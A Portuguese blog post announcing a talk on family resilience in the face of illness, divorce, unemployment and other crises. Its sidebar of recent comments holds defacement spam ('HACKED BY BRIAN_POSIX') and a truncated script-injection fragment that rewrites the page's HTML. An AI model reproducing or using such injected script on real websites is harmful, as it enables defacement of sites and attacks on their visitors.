Labirintos Familiares @ 13:33

Dom, 01/01/12

Todas as famílias, ao longo do seu percurso, lidam com desafios e crises variadas: dependência de um familiar mais velho, dificuldades financeiras, doença crónica de um filho ou conjuge, divórcio, morte de um familiar chegado, desemprego, emigração,, entre outros. Se para muitos tal é o princípio de um sentimento de desestruturação familiar com mais conflitos e afastamento, afirmando que “não há nada a fazer”, são muitas as famílias que, em conjunto, mantêm a esperança e renovam o  sentido de Família.

 

Frequentemente encontramos famílias que referem uma maior aproximação e entreajuda, face a uma ou múltiplas dificuldades: são as famílias que acreditam que são capazes de superar obstáculos e encontrar soluções e que sentem que se fortaleceram num período mais difícil das suas vidas. O que diferencia estas famílias? Como nos podemos inspirar e aumentar (ou manter) a nossa capacidade de lidar com os desafios, protegendo a harmonia familiar?

 

Na próxima 2ª feira, às 17h30, falaremos sobre Resiliência Familiar e possibilidades para lidarmos e nos fortalecermos enquanto famílias perante eventuais adversidades. Junte-se a nós para um novo ano de relações positivas!



Facebook Like

Pub
Rubricas
Comentários recentes
Kd o vídeo?
aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa...
HACKED BY BRIAN_POSIXHACKED BY BRIAN_POSIXHACKED B...
Hacked By Brian_posix !!SIC MULHER PWNED BY BPOSIX...
document.documentElement.innerHTML=unescape("Hacke...
Amei <3 mt
https://m.facebook.com/Veredictod1amor/insights/
Acabei de o receber, muito obrigada!
Pesquisar
 
blogs SAPO